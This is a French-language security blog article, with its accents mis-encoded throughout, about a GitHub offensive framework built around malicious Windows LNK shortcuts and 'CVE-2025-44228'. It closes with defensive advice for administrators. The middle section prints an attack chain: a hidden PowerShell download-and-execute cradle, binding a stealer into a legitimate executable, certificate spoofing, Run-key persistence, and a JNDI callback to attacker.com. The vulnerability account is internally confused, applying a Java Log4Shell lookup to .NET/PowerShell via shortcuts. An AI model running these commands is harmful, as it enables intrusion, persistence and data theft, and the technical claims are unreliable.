Un dépÎt GitHub publié en juin 2025 révÚle un combe offensif clé-en-main exploitant la faille CVE-2025-44228 via des raccourcis Windows LNK piégés. Ce framework, baptisé Lnk-Exploit-FileBinder-Certificate-Spoofer
, combine persistance, Ă©vasion antivirus, injection de certificats et exĂ©cution Ă distance â une menace sĂ©rieuse pour les environnements Windows encore vulnĂ©rables.
Quand un dĂ©pĂŽt GitHub ne se contente pas de « prouver un concept », mais fournit une suite offensive complĂšte, câest un signal fort. Le projet Caztemaz/LnkâExploitâFileBinderâCertificateâSpooferâRegâDocâCveâRce en est lâillustration parfaite. PubliĂ© le 21 juin 2025 Ă 22:18:39 Z, ce framework ne joue pas dans la cour des scripts de pentesteurs dĂ©butants â il vise clairement lâexploitation automatisĂ©e, furtive et persistante des environnements Windows.
Ah oui le lien, ça peut vous aider :
Caztemaz / Lnk-Exploit-FileBinder-Certificate-Spoofer-Reg-Doc-Cve-Rce
âĄïž https://github.com/Caztemaz/Lnk-Exploit-FileBinder-Certificate-Spoofer-Reg-Doc-Cve-Rce
đ Une suite offensive multi-Ă©tapes
Ce dĂ©pĂŽt Visual Basic .NET compile un arsenal de fonctionnalitĂ©s offensives rĂ©unies dans un seul outil, avec une ambition claireâŻ: bypasser les protections modernes tout en maximisant la persistance sur les machines ciblĂ©es.
Fonctionnalités principales :
- đ LNK Exploit
GénÚre des raccourcis Windows.lnk
piĂ©gĂ©s, capables de lancer des payloads Ă l’ouverture via des commandes PowerShell ou autres exĂ©cutables, tout en masquant leur intention derriĂšre des icĂŽnes et cibles lĂ©gitimes. - đŠ File Binder
Permet de fusionner plusieurs fichiers (binaire malveillant + leurre lĂ©gitime) dans un exĂ©cutable unique. TrĂšs utilisĂ© pour dissimuler un RAT ou un stealer dans un fichier dâapparence inoffensive. - đ Certificate Spoofer
Injecte des certificats forgĂ©s pour donner Ă lâexĂ©cutable lâapparence dâun fichier signĂ© â trompant ainsi les utilisateurs et certains antivirus. - đ ïž Persistance via registre
Ajoute automatiquement une clé dansHKCU\Software\Microsoft\Windows\CurrentVersion\Run
ou via des tĂąches planifiĂ©es pour relancer le payload Ă chaque dĂ©marrage. - đ Inclusion dans documents
Injecte le payload dans des fichiers.docx
,.rtf
,.xls
exploitant des macros ou champs DDE, pour une diffusion via phishing. - đ RCE via CVE-2025â44228
Exploite une faille récente surnommée « Log4Shell-like », utilisant des raccourcis.lnk
couplĂ©s Ă des appels rĂ©seau pour exĂ©cuter des commandes Ă distance silencieusement. - đ§ Techniques FUD et anti-sandbox
Contournement dâantivirus avec obfuscation, dĂ©lai Ă lâexĂ©cution, dĂ©tection dâenvironnement virtuel pour Ă©viter les sandbox de sandboxie, Cuckoo ou VirusTotal.
đ§Ș Mise en Ćuvre technique (POC)
â ïž Usage strictement rĂ©servĂ© Ă des environnements de test ou dans le cadre dâun audit autorisĂ©. Lâoutil est extrĂȘmement dangereux et facilement dĂ©ployable.
Pré-requis
- VM Windows 10/11 avec droits administrateur
- .NET Framework 4.8 installé
- Visual Studio (pour examiner le code)
- Python 3.x (optionnel pour servir un shell distant)
- Serveur HTTP Ă disposition (pour payloads distants)
Exemple de chaĂźne dâattaque
Ătape 1 : GĂ©nĂ©rer le LNK piĂ©gĂ©
powershell C:\> LnkGen.exe -icon "pdf.ico" -target "powershell.exe" -args "-exec bypass -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.0.5/payload.ps1')"
Le LNK ouvre discrÚtement PowerShell et télécharge un script malveillant.
Ătape 2 : Binder un outil lĂ©gitime avec le stealer
bash FileBinder.exe -f1 "notepad.exe" -f2 "Stealer.exe" -out "NoteLegit.exe"<br>
Ătape 3 : Spoofer le certificat du binaire final
bash CertSpoofer.exe -in "NoteLegit.exe" -cert "signed_dll_template.cer" -out "FinalPayload.exe"
Ătape 4 : Ajout au registre (persistance)
powershell reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "OfficeUpdate" /t REG_SZ /d "C:\Users\Public\FinalPayload.exe" /f
Ătape 5 : DĂ©clenchement RCE via CVE-2025-44228
Dans le script PowerShell téléchargé :
powershell Invoke-WebRequest -Uri "http://vuln-target.local/log?msg=${jndi:ldap://attacker.com/callback}"
Cela exploite une faille dans le composant de journalisation (équivalent Java/Log4Shell) vulnérable sur certaines applications .NET ou PowerShell.
đ Pourquoi câest problĂ©matique
Ce dĂ©pĂŽt ne se contente pas dâimplĂ©menter des outils connusâŻ: il les orchestre de maniĂšre fluide, en un pipeline offensif qui :
- sâinfiltre via un fichier anodin
- bypass les antivirus
- persiste sur la machine
- sâexĂ©cute Ă distance
- et sâauto-repique via des documents ou dâautres scripts
Le tout avec un README documentĂ©, une licence MIT (donc redistribuable), et des captures dâĂ©cran pĂ©dagogiques.
đ§© En conclusion : un framework dâexploitation complet
Le dĂ©pĂŽt Caztemaz/LnkâExploitâ⊠nâest ni un Proof-of-Concept isolĂ©, ni un simple binder ou un obfuscateur. Il s’agit dâune vĂ©ritable boĂźte Ă outils offensive prĂȘte Ă l’emploi, ciblant directement les faiblesses humaines et techniques des environnements Windows.
Il sâinscrit dans la logique post-Log4Shell, oĂč lâexploitation RCE est facilitĂ©e par la combinaison de techniques simples mais efficaces.
â ïž Si vous administrez un parc Windows, ce genre de dĂ©pĂŽt doit servir dâalerte : vos filtres dâextension, vos rĂšgles EDR, votre proxy, vos GPO et votre stratĂ©gie de mises Ă jour doivent ĂȘtre capables de contrer un tel outil.
đĄïž Bonnes pratiques recommandĂ©es :
- Bloquez lâexĂ©cution des
.lnk
provenant dâemplacements suspects (GPO, AppLocker). - DĂ©sactivez les macros par dĂ©faut et bloquez les formats
.rtf
,.docm
par dĂ©faut. - Surveillez les requĂȘtes vers des domaines inconnus ou internes via proxy ou IDS.
- Appliquez en priorité le correctif de la CVE-2025-44228 sur toutes les applications vulnérables.
- Activez le Windows Defender SmartScreen, mĂȘme pour les fichiers locaux.
- Utilisez un EDR capable de détecter les injections PowerShell et les mouvements latéraux.